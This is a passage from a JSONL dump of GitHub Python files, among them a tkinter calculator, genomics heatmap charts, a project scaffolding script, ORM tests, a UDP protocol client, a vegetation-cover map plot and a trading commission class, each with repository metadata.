\"both\")\r\n\r\nbtnrow4 = Frame(root)\r\nbtnrow4.pack(expand = True, fill = \"both\")\r\nbtnrow5 = Frame(root)\r\nbtnrow5.pack(expand = True, fill = \"both\")\r\n\r\n# Button designed and its command\r\nbtn1 = Button(\r\n btnrow1,\r\n text = \"1\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_1_isclicked,\r\n )\r\nbtn1.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nbtn2 = Button(\r\n btnrow1,\r\n text = \"2\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_2_isclicked,\r\n )\r\nbtn2.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nbtn3 = Button(\r\n btnrow1,\r\n text = \"3\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_3_isclicked,\r\n )\r\nbtn3.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nbtn4 = Button(\r\n btnrow1,\r\n text = \"+\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_plus_clicked,\r\n \r\n )\r\nbtn4.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\n\r\n\r\nbtn1 = Button(\r\n btnrow2,\r\n text = \"4\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_4_isclicked,\r\n )\r\n\r\nbtn1.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nbtn2 = Button(\r\n btnrow2,\r\n text = \"5\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_5_isclicked,\r\n )\r\nbtn2.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nbtn3 = Button(\r\n btnrow2,\r\n text = \"6\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_6_isclicked,\r\n )\r\nbtn3.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nbtn4 = Button(\r\n btnrow2,\r\n text = \"-\",\r\n font = (\"verdana\", 24),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_minus_clicked,\r\n )\r\nbtn4.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\n\r\n\r\n\r\nbtn1 = Button(\r\n btnrow3,\r\n text = \"7\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_7_isclicked,\r\n )\r\nbtn1.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nbtn2 = Button(\r\n btnrow3,\r\n text = \"8\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_8_isclicked,\r\n )\r\nbtn2.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nbtn3 = Button(\r\n btnrow3,\r\n text = \"9\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_9_isclicked,\r\n )\r\nbtn3.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nbtn4 = Button(\r\n btnrow3,\r\n text = \"x\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_multi_clicked,\r\n )\r\nbtn4.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\n\r\n\r\n\r\n\r\nbtn1 = Button(\r\n btnrow4,\r\n text = \"C\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = c_pressed,\r\n )\r\nbtn1.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nbtn2 = Button(\r\n btnrow4,\r\n text = \"0\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_0_isclicked)\r\nbtn2.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nbtn3 = Button(\r\n btnrow4,\r\n text = \"=\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = result,)\r\nbtn3.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nbtn4 = Button(\r\n btnrow4,\r\n text = \"/\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_div_clicked,\r\n )\r\nbtn4.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nbtn5 = Button(\r\n btnrow5,\r\n text = \"<-\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = erase_pressed\r\n )\r\nbtn5.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nroot.mainloop()","repo_name":"ZaidanNur/PojectProjectan","sub_path":"Python OOP/Kalkulator/Kalkulator.py","file_name":"Kalkulator.py","file_ext":"py","file_size_in_byte":7221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17209724716","text":"import altair as alt\nimport pandas as pd\nimport streamlit as st\n#Disable the row limit\n\n\ndef count_amplification(df, gene, sample_type):\n return df[(df[f'cna_{gene}'] > 0) & (df['Sample_Types'] == sample_type)]['SAMPLE_ID'].nunique()\n\ndef count_deletion(df, gene, sample_type):\n return df[(df[f'cna_{gene}'] < 0) & (df['Sample_Types'] == sample_type)]['SAMPLE_ID'].nunique()\n\ndef count_mutation(df, gene, sample_type):\n return df[(df[f'mut_{gene}'] != 0) & (df['Sample_Types'] == sample_type)]['SAMPLE_ID'].nunique()\n\ndef count_samples(df, sample_type):\n return df[df['Sample_Types'] == sample_type]['SAMPLE_ID'].nunique()\n\ndef fraction(row):\n total = row['Total']\n if total == 0:\n return 0\n else:\n return int(row[row.name]) / int(total)\n\ndef get_jason_charts(selected_cancer, valid_genes, cna_df, mut_df, sample_df):\n sample_df['Sample_Types'] = \"None\"\n sample_df.loc[(sample_df['Sample Type'] == 'Primary') & (sample_df['Metastatic patient'] == True), \n 'Sample_Types'] = \"Primary_from_Met\"\n sample_df.loc[(sample_df['Sample Type'] == 'Primary') & (sample_df['Metastatic patient'] == False), \n 'Sample_Types'] = \"Primary_from_NoMet\"\n sample_df.loc[(sample_df['Sample Type'] == 'Metastasis'), 'Sample_Types'] = \"Metastasis\"\n\n sample_df['patient_count'] = 1\n sample_df = sample_df.rename(columns={'Sample ID': 'SAMPLE_ID'})\n\n filtered_mut_df = mut_df[mut_df[\"Hugo_Symbol\"].isin(valid_genes)]\n filtered_cna_df = cna_df[cna_df[\"Hugo_Symbol\"].isin(valid_genes)]\n\n filtered_cna_df_T = filtered_cna_df.set_index('Hugo_Symbol').T\n filtered_cna_df_T.reset_index(inplace=True)\n filtered_cna_df_T = filtered_cna_df_T.add_prefix(\"cna_\")\n filtered_cna_df_T = filtered_cna_df_T.rename(columns={'cna_index': 'SAMPLE_ID'})\n\n sample_df_filtered_cancer_types = None\n if selected_cancer != \"Pan Cancer\":\n sample_df_filtered_cancer_types = sample_df[sample_df[\"Cancer Type\"].isin([selected_cancer])]\n else:\n sample_df_filtered_cancer_types = sample_df\n\n filtered_cna_df_T = filtered_cna_df.set_index('Hugo_Symbol').T\n filtered_cna_df_T.reset_index(inplace=True)\n filtered_cna_df_T = filtered_cna_df_T.add_prefix(\"cna_\")\n filtered_cna_df_T = filtered_cna_df_T.rename(columns={'cna_index': 'SAMPLE_ID'})\n # 2. Merge CNA into sample table.\n sample_cna_df_filtered_cancer_types = sample_df_filtered_cancer_types.merge(filtered_cna_df_T,\n on='SAMPLE_ID',\n # Left is filtered, right is not\n how='left')\n # 3. Wrangle with mutation dataframe.\n filtered_mut_heat = filtered_mut_df[[\"Hugo_Symbol\", \"Tumor_Sample_Barcode\", \"Variant_Classification\"]]\n filtered_mut_heat = filtered_mut_heat.groupby([\"Tumor_Sample_Barcode\", \"Hugo_Symbol\"]).size().reset_index(name='Count')\n filtered_mut_heat = pd.pivot(filtered_mut_heat, columns=['Hugo_Symbol'], index=[\"Tumor_Sample_Barcode\"], values=\"Count\").add_prefix(\"mut_\").reset_index()\n filtered_mut_heat = filtered_mut_heat.rename(columns={'Tumor_Sample_Barcode': 'SAMPLE_ID'})\n # 4. Merge mutation into sample table.\n merged_sample_df = sample_cna_df_filtered_cancer_types.merge(filtered_mut_heat,\n on='SAMPLE_ID',\n # Left is filtered by cancer type, right is not\n how='left')\n merged_sample_df = merged_sample_df.fillna(0)\n\n counts = []\n Pri_Met = ['Primary_from_Met', 'Primary_from_NoMet', 'Metastasis']\n primary_from_met_count = count_samples(merged_sample_df, 'Primary_from_Met')\n primary_from_no_met_count = count_samples(merged_sample_df, 'Primary_from_NoMet')\n metastasis_count = count_samples(merged_sample_df, 'Metastasis')\n for gene in valid_genes:\n for pm in Pri_Met:\n amplification_count = count_amplification(merged_sample_df, gene,pm)\n deletion_count = count_deletion(merged_sample_df, gene,pm)\n mutation_count = count_mutation(merged_sample_df, gene,pm)\n counts.append({\n 'Gene': gene,\n 'Sample_Types': pm,\n 'Amplification': amplification_count,\n 'Deletion': deletion_count,\n 'Mutation': mutation_count,\n 'Total': primary_from_met_count,\n 'Amplification_Fraction': amplification_count / primary_from_met_count,\n 'Deletion_Fraction': deletion_count / primary_from_met_count,\n 'Mutation_Fraction': mutation_count / primary_from_met_count\n })\n \n counts_df = pd.DataFrame(counts)\n\n # Base chart\n base = alt.Chart(counts_df).encode(\n alt.X('Gene', sort=alt.EncodingSortField(field='Gene', op='count', order='ascending')),\n alt.Y('Sample_Types', axis=alt.Axis(labelFontSize=9),\n sort=alt.EncodingSortField(field='Sample_Types', op='count', order='ascending')),\n )\n\n # Create Amplification heatmap\n amp_heatmap = base.mark_rect().encode(\n alt.Color('Amplification_Fraction:Q', scale=alt.Scale(scheme='reds')),\n ).properties(width=500,title='Amplification Heatmap')\n\n # Create Deletion heatmap\n del_heatmap = base.mark_rect().encode(\n alt.Color('Deletion_Fraction:Q', scale=alt.Scale(scheme='blues')),\n ).properties(width=500,title='Deletion Heatmap')\n\n # Create Mutation heatmap\n mut_heatmap = base.mark_rect().encode(\n alt.Color('Mutation_Fraction:Q', scale=alt.Scale(scheme='greens')),\n ).properties(width=500,title='Mutation Heatmap')\n \n #cna plot\n bar_cna_df_T = filtered_cna_df.set_index('Hugo_Symbol').T\n bar_cna_df_T.reset_index(inplace=True)\n bar_cna_df_T = bar_cna_df_T.rename(columns={'index': 'SAMPLE_ID'})\n merged_bar_cna_df_T = sample_df_filtered_cancer_types.merge(bar_cna_df_T, on='SAMPLE_ID', how='left') \n index = merged_bar_cna_df_T.columns.get_loc('patient_count')\n cna_id_vars = merged_bar_cna_df_T.columns[:index+1]\n df_tall = pd.melt(merged_bar_cna_df_T, id_vars=cna_id_vars, var_name='Gene', value_name='Copy_Number')\n df_tall['Copy_Number_Status'] = df_tall['Copy_Number'].apply(\n lambda x: 'Amplification' if x > 0 else ('Deletion' if x < 0 else None)\n )\n cna_counts = df_tall.groupby(['Gene', 'Sample_Types', 'Copy_Number_Status']).size().reset_index(name='Count')\n\n cna_chart = alt.Chart(cna_counts).mark_bar().encode(\n x='Gene:N',\n y='Count:Q',\n color=alt.Color('Copy_Number_Status:N', scale=alt.Scale(domain=['Deletion', 'Amplification'],\n range=['blue', 'red'])),\n column= alt.Column('Sample_Types:N', header=alt.Header(title=None)) \n ).properties(\n width=180,title='Copy Number Count')\n \n #variant classification plot\n vc_mut_df = filtered_mut_df[[\"Hugo_Symbol\", \"Tumor_Sample_Barcode\", \"Variant_Classification\"]]\n vc_mut_df = vc_mut_df.groupby([\"Tumor_Sample_Barcode\", \"Hugo_Symbol\",\"Variant_Classification\"]).size().reset_index(name='Count')\n vc_mut_df = vc_mut_df.rename(columns={'Tumor_Sample_Barcode': 'SAMPLE_ID'})\n\n merged_vc_mut_df = sample_df_filtered_cancer_types.merge(vc_mut_df, on='SAMPLE_ID', how='inner')\n grouped_df = merged_vc_mut_df.groupby(['Hugo_Symbol', 'Sample_Types', 'Variant_Classification']).size().reset_index(name='Count')\n\n vc_chart = alt.Chart(grouped_df).mark_bar().encode(\n x=alt.X('Hugo_Symbol:N', title='Gene'),\n y='Count:Q',\n color='Variant_Classification:N',\n column=alt.Column('Sample_Types:N', header=alt.Header(title=None)) \n ).properties(width=180, title='Variant Classification Count')\n\n all_chart = amp_heatmap & del_heatmap & mut_heatmap & cna_chart & vc_chart\n\n return all_chart\n","repo_name":"huntbeat/bmi706-final-project","sub_path":"jason.py","file_name":"jason.py","file_ext":"py","file_size_in_byte":8094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16491408459","text":"# for end to end projects we need lots of files and folders and we need to manage our code, so instead of creatig those file maunally , we will creat one python script and and write one logic here\n\n# Import some libraries\nimport os #operating system\nfrom pathlib import Path #path \nimport logging\n\nlogging.basicConfig(level=logging.INFO, format='[%(asctime)s]: %(message)s:') #time the code is executed and the error message\n\n\nproject_name = \"mlProject\"\n\n#first it will create a src folder which will contain the project files \nlist_of_files = [\n \".github/workflows/.gitkeep\", # we need this for cicd deplyoment using github action\n f\"src/{project_name}/__init__.py\", #all the constructors will be insde the src folder\n f\"src/{project_name}/components/__init__.py\",\n f\"src/{project_name}/utils/__init__.py\",\n f\"src/{project_name}/utils/common.py\",\n f\"src/{project_name}/config/__init__.py\",\n f\"src/{project_name}/config/configuration.py\",\n f\"src/{project_name}/pipeline/__init__.py\",\n f\"src/{project_name}/entity/__init__.py\",\n f\"src/{project_name}/entity/config_entity.py\",\n f\"src/{project_name}/constants/__init__.py\",\n \"config/config.yaml\", # all of the configuration of the project\n \"params.yaml\",\n \"schema.yaml\",\n \"main.py\",\n \"app.py\",\n \"Dockerfile\",\n \"requirements.txt\",\n \"setup.py\",\n \"research/trials.ipynb\",\n \"templates/index.html\",\n #\"test.py\" #to create another file just write here\n\n\n]\n\n\n\n\nfor filepath in list_of_files:\n filepath = Path(filepath)\n filedir, filename = os.path.split(filepath) #separating directory/folder from filesystem/path\n\n#checking if folder exsits or not, if not then create a new directory and log the information\n if filedir !=\"\":\n os.makedirs(filedir, exist_ok=True)\n logging.info(f\"Creating directory; {filedir} for the file: {filename}\")\n\n#chekcing if file exists or not, if not then create a new file and log the information\n if (not os.path.exists(filepath)) or (os.path.getsize(filepath) == 0):\n with open(filepath, \"w\") as f:\n pass\n logging.info(f\"Creating empty file: {filepath}\")\n\n#if everything is right, just pass the infor, that it exists\n else:\n logging.info(f\"{filename} is already exists\")\n","repo_name":"Pan2707/End-to-end-ML-project-with-ML-flow","sub_path":"template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33982557880","text":"# coding = utf-8\n\nimport comall\nimport time\nimport unittest\nimport setting.qiguojie.setting as my_set\nfrom setting.qiguojie import data\nfrom setting.qiguojie import el\n\n\nclass QiGuoJieTest(unittest.TestCase):\n\n def setUp(self):\n self.dr = comall.Comall(my_set.driver_type)\n self.dr.open(my_set.local_url)\n self.dr.max_window()\n time.sleep(3)\n\n def test_next_window(self):\n qq = self.dr\n qq.click(\"xpath\", el.localhost_open_window_a)\n\n qq.switch_next_window()\n\n qq.send_keys(\"xpath\", \"//*[@id='kw']\", \"qiguojie\")\n\n qq.click(\"xpath\", \"//*[@id='su']\")\n\n\n def tearDown(self):\n # qq = self.dr\n # qq.quit()\n pass\n\n\n# 下面是脚本单独调试所需代码\nif __name__ == \"__main__\":\n suite = unittest.TestLoader().loadTestsFromTestCase(TestCase)\n result = unittest.TextTestRunner(verbosity=2).run(suite)","repo_name":"huiboSong/tester","sub_path":"tests/members/qiguojie/qiguojie_study_03.py","file_name":"qiguojie_study_03.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30732276615","text":"\nclass BinaryTree():\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n \n def add(self, value):\n pass\n\n\npre_order=[]\nin_order=[]\npost_order=[]\ndef BSTTraversal(node):\n if node is None:\n return\n \n global pre_order\n pre_order.append(node.value)\n\n BSTTraversal(node.left)\n\n global in_order\n in_order.append(node.value)\n \n BSTTraversal(node.right)\n\n global post_order\n post_order.append(node.value)\n\n\n\n\ndef test():\n root = BinaryTree(10)\n root.left = BinaryTree(5)\n root.right = BinaryTree(15)\n root.left.left = BinaryTree(1)\n root.left.right = BinaryTree(7)\n root.right.left = BinaryTree(13)\n root.right.right = BinaryTree(18)\n\n\n sums = BSTTraversal(root)\n print(pre_order)\n print(in_order)\n print(post_order)\n\n\ntest()","repo_name":"pavancd/algorithms","sub_path":"BSTTraversal/BSTTraversal.py","file_name":"BSTTraversal.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10722063240","text":"import pytest\nfrom tests.settings import DATABASE_URL\n\nimport edgy\nfrom edgy.core.db.fields.core import Field\nfrom edgy.exceptions import MultipleObjectsReturned, ObjectNotFound\nfrom edgy.testclient import DatabaseTestClient as Database\n\ndatabase = Database(url=DATABASE_URL)\nmodels = edgy.Registry(database=database)\n\npytestmark = pytest.mark.anyio\n\n\nclass User(edgy.Model):\n id: int = edgy.IntegerField(primary_key=True)\n name: str = edgy.CharField(max_length=100, null=True)\n language: str = edgy.CharField(max_length=200, null=True)\n\n class Meta:\n registry = models\n\n\nclass Product(edgy.Model):\n id: int = edgy.IntegerField(primary_key=True)\n name: str = edgy.CharField(max_length=100, null=True)\n rating: int = edgy.IntegerField(minimum=1, maximum=5, default=1)\n in_stock: bool = edgy.BooleanField(default=False)\n\n class Meta:\n registry = models\n name = \"products\"\n\n\n@pytest.fixture(autouse=True, scope=\"function\")\nasync def create_test_database():\n await models.create_all()\n yield\n await models.drop_all()\n\n\n@pytest.fixture(autouse=True)\nasync def rollback_connections():\n with database.force_rollback():\n async with database:\n yield\n\n\ndef test_model_class():\n assert list(User.fields.keys()) == [\"id\", \"name\", \"language\"]\n assert isinstance(User.fields[\"id\"], Field)\n assert User.fields[\"id\"].primary_key is True\n assert isinstance(User.fields[\"name\"], Field)\n assert User.fields[\"name\"].max_length == 100\n\n assert User(id=1) != Product(id=1)\n assert User(id=1) != User(id=2)\n assert User(id=1) == User(id=1)\n\n assert str(User(id=1)) == \"User(id=1)\"\n assert repr(User(id=1)) == \"\"\n\n assert isinstance(User.query.fields[\"id\"], Field)\n assert isinstance(User.query.fields[\"name\"], Field)\n\n\ndef test_model_pk():\n user = User(pk=1)\n assert user.pk == 1\n assert user.id == 1\n assert User.query.pkname == \"id\"\n\n\nasync def test_model_crud():\n users = await User.query.all()\n assert users == []\n\n user = await User.query.create(name=\"Test\")\n users = await User.query.all()\n assert user.name == \"Test\"\n assert user.pk is not None\n assert users == [user]\n\n lookup = await User.query.get()\n assert lookup == user\n\n await user.update(name=\"Jane\")\n users = await User.query.all()\n assert user.name == \"Jane\"\n assert user.pk is not None\n assert users == [user]\n\n await user.delete()\n users = await User.query.all()\n assert users == []\n\n\nasync def test_model_get():\n with pytest.raises(ObjectNotFound):\n await User.query.get()\n\n user = await User.query.create(name=\"Test\")\n lookup = await User.query.get()\n assert lookup == user\n\n user = await User.query.create(name=\"Jane\")\n with pytest.raises(MultipleObjectsReturned):\n await User.query.get()\n\n same_user = await User.query.get(pk=user.id)\n assert same_user.id == user.id\n assert same_user.pk == user.pk\n","repo_name":"tarsil/edgy","sub_path":"tests/models/test_model_class.py","file_name":"test_model_class.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"21"} +{"seq_id":"40795902956","text":"from Network import Client\nfrom UAP import Message, UAP\nimport random\nimport time\nimport socket\n\nclass UAPClient(Client):\n\n STATES = {\n \"Hello wait\" : 0,\n \"Ready\" : 1,\n \"Ready Timer\" : 2,\n \"Closing\" : 3,\n \"\" : 4,\n }\n\n def __init__(self, client : Client):\n self.instance = client\n self.state = UAPClient.STATES[\"Hello wait\"]\n\n self.instance.SendPacket = self.SendPacket\n self.instance.HandlePacket = self.HandlePacket\n self.instance.RecievePacket = self.RecievePacket\n\n\n def SendPacket(self, message : Message):\n self.instance.client_socket.sendall(message.EncodeMessage())\n self.seq += 1\n\n def HandlePacket(self, message : str, isEOF : bool = False):\n if self.state == UAPClient.STATES[\"Closing\"]:\n return\n \n if self.TimerTimeout():\n return self.Exit(\"Timeout\")\n\n if isEOF:\n self.SendPacket(Message(\n UAP.CommandEnum.GOODBYE,\n self.seq,\n self.sID,\n message\n ))\n self.Exit(message)\n while self.instance.running.is_set():\n pass\n return\n \n message = Message(\n UAP.CommandEnum.DATA, \n self.seq, \n self.sID, \n message\n )\n self.SendPacket(message)\n\n def RecievePacket(self):\n waitingState = False\n while self.instance.running.is_set():\n try:\n data, _ = self.instance.client_socket.recvfrom(1024)\n msg = Message.DecodeMessage(data)\n if msg.command == UAP.CommandEnum.HELLO:\n print(\"Recieved Hello from server\")\n if msg.command == UAP.CommandEnum.GOODBYE:\n self.instance.Exit(\"GOODBYE from server\")\n if msg.command == UAP.CommandEnum.ALIVE:\n self.TimerStart()\n except socket.timeout:\n if waitingState:\n self.instance.Exit(\"Timeout from wait\")\n else:\n self.waitingState = True\n\n\n def Run(self):\n # Session start hello\n self.sID = random.getrandbits(32)\n self.seq = 0\n helloMessage = Message(UAP.CommandEnum.HELLO, self.seq, self.sID, \"\")\n self.SendPacket(helloMessage)\n\n # Wait for hello\n self.instance.client_socket.settimeout(self.instance.timeout)\n while True: \n try:\n data, _ = self.instance.client_socket.recvfrom(1024)\n msg = Message.DecodeMessage(data)\n if msg.sID == self.sID and msg.command == UAP.CommandEnum.HELLO:\n self.state = UAPClient.STATES[\"Ready\"]\n break\n except KeyboardInterrupt:\n self.instance.Exit(\"Keyboard interrupt\")\n except socket.timeout:\n self.Exit(\"Timeout\")\n quit()\n except ConnectionRefusedError:\n self.Exit(\"Connection refused\")\n quit()\n \n self.TimerStart()\n self.instance.Run()\n\n def Exit(self, reason):\n print(\"Closing. Reason:\", reason)\n self.state = UAPClient.STATES[\"Closing\"]\n message = Message(\n UAP.CommandEnum.GOODBYE,\n self.seq,\n self.sID,\n reason\n )\n self.SendPacket(message)\n\n def TimerStart(self):\n self.timerStart = time.time()\n\n def TimerTimeout(self):\n return time.time() - self.timerStart > self.instance.timeout\n \nif __name__ == \"__main__\":\n import sys\n from ThreadedNetwork import ThreadedClient\n\n if len(sys.argv) < 3:\n print(\"Usage: UAPClient.py host port [client_recieve_port]\")\n quit()\n\n elif len(sys.argv) == 3: \n client = UAPClient(ThreadedClient(sys.argv[1], int(sys.argv[2])))\n else:\n client = UAPClient(ThreadedClient(sys.argv[1], int(sys.argv[2]), int(sys.argv[3])))\n\n client.Run()\n ","repo_name":"unniisme/Networking","sub_path":"UDPcommunicator/UAPClient.py","file_name":"UAPClient.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74131718131","text":"print(\"\"\"\n NOISE DECIBEL LEVELS\n Jackhammer 130db\n Gas Lawnmower 106db\n Alarm Clock 70db\n Quiet Room 40db\n\"\"\")\n\nJackhammer = 130\nGas_Lawnmower = 106\nAlarm_Clock = 70\nQuiet_Room = 40\n\nsl = int(input(\"Enter a sound level in decibel: \"))\n\nif Gas_Lawnmower < sl < Jackhammer:\n print(\"The sound level is between Gas Lawnmower and Jackhammer\")\nelif Alarm_Clock < sl < Gas_Lawnmower:\n print(\"The sound level is between Gas Lawnmower and Alarm Clock\")\nelif Quiet_Room < sl < Alarm_Clock:\n print(\"The sound level is between Quiet Room and Alarm Clock\")","repo_name":"GRAFRA346/Python-workbook-exercises","sub_path":"Sound_Levels.py","file_name":"Sound_Levels.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"940190368","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreate PFT map MEGAN\r\n\r\n@author: Jordan Capnerhurst 2016\r\n\"\"\"\r\n\r\n# import things\r\nfrom mpl_toolkits.basemap import Basemap\r\nimport matplotlib.pyplot as pyplot\r\nimport numpy as np\r\nimport netCDF4\r\nimport scipy.interpolate\r\n\r\n# Set colour map\r\ncool = cm = pyplot.get_cmap('rainbow')\r\n\r\nf = netCDF4.Dataset('O:\\Honours_data\\KMEGAN\\FebMEG.nc','r')\r\n\r\npf1 = netCDF4.Dataset('O:/Honours_data/JMEGAN/Plants/btr200121_30sec.nc','r') #broad leaf tree\r\npf2 = netCDF4.Dataset('O:/Honours_data/JMEGAN/Plants/hrb200121_30sec.nc', 'r') #Herbacioius\r\npf3 = netCDF4.Dataset('O:/Honours_data/JMEGAN/Plants/ntr200121_30sec.nc', 'r') # needle leaf\r\npf4 = netCDF4.Dataset('O:/Honours_data/JMEGAN/Plants/shr200121_30sec.nc', 'r') # Shrubs\r\n\r\n# [ time, source, lon, lat ]\r\nv = (pf1.variables['Broadleaf_tree_cover_fraction_for_year_2001_(m2_per_m2)'])\r\n#vma = np.ma.masked_less_equal(v, 10)\r\n\r\nv1 = (pf2.variables['Herbaceous_vegetation_cover_fraction_for_year_2001_(m2_per_m2)'])\r\n#vma1 = np.ma.masked_less_equal(v1, 10)\r\n\r\nv2 = (pf3.variables['Needleleaf_tree_cover_fraction_for_year_2001_(m2_per_m2)'])\r\n#vma2 = np.ma.masked_less_equal(v2, 10)\r\n\r\nv3 = (pf4.variables['Shrub_cover_fraction_for_year_2001_(m2_per_m2)'])\r\n#vma3 = np.ma.masked_less_equal(v3, 10)\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n# new 3-km grid\r\nglon3 = f.variables['lon'][:]\r\nglat3 = f.variables['lat'][:]\r\n\r\n# dlon, dlat = spacing (keep extra just in case)\r\ndlon3 = glon3[-1] - glon3[-2]\r\ndlat3 = glat3[-1] - glat3[-2]\r\n\r\n\r\n# old 1-km grid\r\nglon1 = pf1.variables['lon'][:]\r\nglat1 = pf1.variables['lat'][:]\r\n\r\n\r\n# Cut LAI & old lon/lat to match size of new grid (makes it a lot faster!!)\r\nlonind = np.where((glon1 >= glon3[0]-dlon3) & (glon1 <= glon3[-1]+dlon3))\r\nv = v[:,lonind[0][:]]\r\nglon1 = glon1[lonind[0][:]]\r\n\r\nlatind = np.where((glat1 >= glat3[0]-dlat3) & (glat1 <= glat3[-1]+dlat3))\r\nv = v[latind[0][:],:]\r\nglat1 = glat1[latind[0][:]]\r\n\r\n#create mesh\r\nX, Y = np.meshgrid(glon1, glat1)\r\nXI, YI = np.meshgrid(glon3, glat3)\r\n\r\n#interpolate\r\nPFTnew=scipy.interpolate.griddata((X.flatten(),Y.flatten()),v.flatten() , (XI,YI), method='linear')\r\n\r\nPFTmask = np.ma.masked_less_equal(PFTnew, 10)\r\n\r\n#------------------------------------------------------------------------------\r\ntrans = 0.6\r\n\r\nmap = Basemap(llcrnrlon=150.1,\r\n llcrnrlat=-34.7177,\r\n urcrnrlon=151.651,\r\n urcrnrlat=-33.5651, epsg=4269)\r\n \r\n #http://server.arcgisonline.com/arcgis/rest/services\r\n #EPSG Number of America is 4269\r\n\r\n\r\n\r\nf=pyplot.figure()\r\n\r\npyplot.figure(figsize=(10, 10))\r\n\r\n\r\n \r\n# plot the data\r\ncol=map.pcolormesh(glon3,glat3,PFTmask,latlon=True,vmin=0, vmax = 100, alpha=trans,cmap=cool)\r\n\r\n\r\n# Draw Meridians and labels\r\nmap.drawmeridians(np.arange(0, 360, 1), labels=[0, 0, 0, 1], fontsize=10,\r\n color='black', linewidth=2)\r\nmap.drawparallels(np.arange(-90, 90, 1), labels=[1, 0, 0, 0], fontsize=10,\r\n color='black', linewidth=2)\r\n\r\nmap.arcgisimage(service='World_Imagery', xpixels = 1000, verbose= True)\r\n\r\n# add a color bar\r\ncb = map.colorbar(col, \"bottom\", alpha=trans)\r\n\r\npyplot.title(\"MEGAN Domain 3 Shrub cover \\n Sydney Metropolitan \\\r\nRegion Feburary 2011\", fontsize=10)\r\n\r\n\r\n\r\n#plt.savefig('./bmap_syd.tiff')\r\n\r\n\r\n","repo_name":"jordanc365/Atmos-chem-models","sub_path":"3x3 PFT map ME D3.py","file_name":"3x3 PFT map ME D3.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73280005171","text":"from backtrader.comminfo import CommInfoBase\n\n\nclass OandaV20CommInfoBacktest(CommInfoBase):\n\n params = dict(\n spread=2.0,\n stocklike=False,\n pip_location=-4,\n acc_counter_currency=True,\n automargin=1.00,\n leverage=1,\n mult=1,\n commtype=CommInfoBase.COMM_FIXED,\n )\n\n def getvaluesize(self, size, price):\n # In real life the margin approaches the price\n return abs(size) * price\n\n def getoperationcost(self, size, price):\n '''Returns the needed amount of cash an operation would cost'''\n # Same reasoning as above\n return abs(size) * price\n\n def _getcommission(self, size, price, pseudoexec):\n '''\n This scheme will apply half the commission when buying and half when selling.\n If account currency is same as the base currency, change pip value calc.\n https://community.backtrader.com/topic/525/forex-commission-scheme\n '''\n multiplier = float(10 ** self.p.pip_location)\n comm = abs((self.p.spread * ((size / price) * multiplier)/2))\n return comm\n","repo_name":"brightcircledevops/btoandav20","sub_path":"btoandav20/commissions/oandav20comm.py","file_name":"oandav20comm.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} 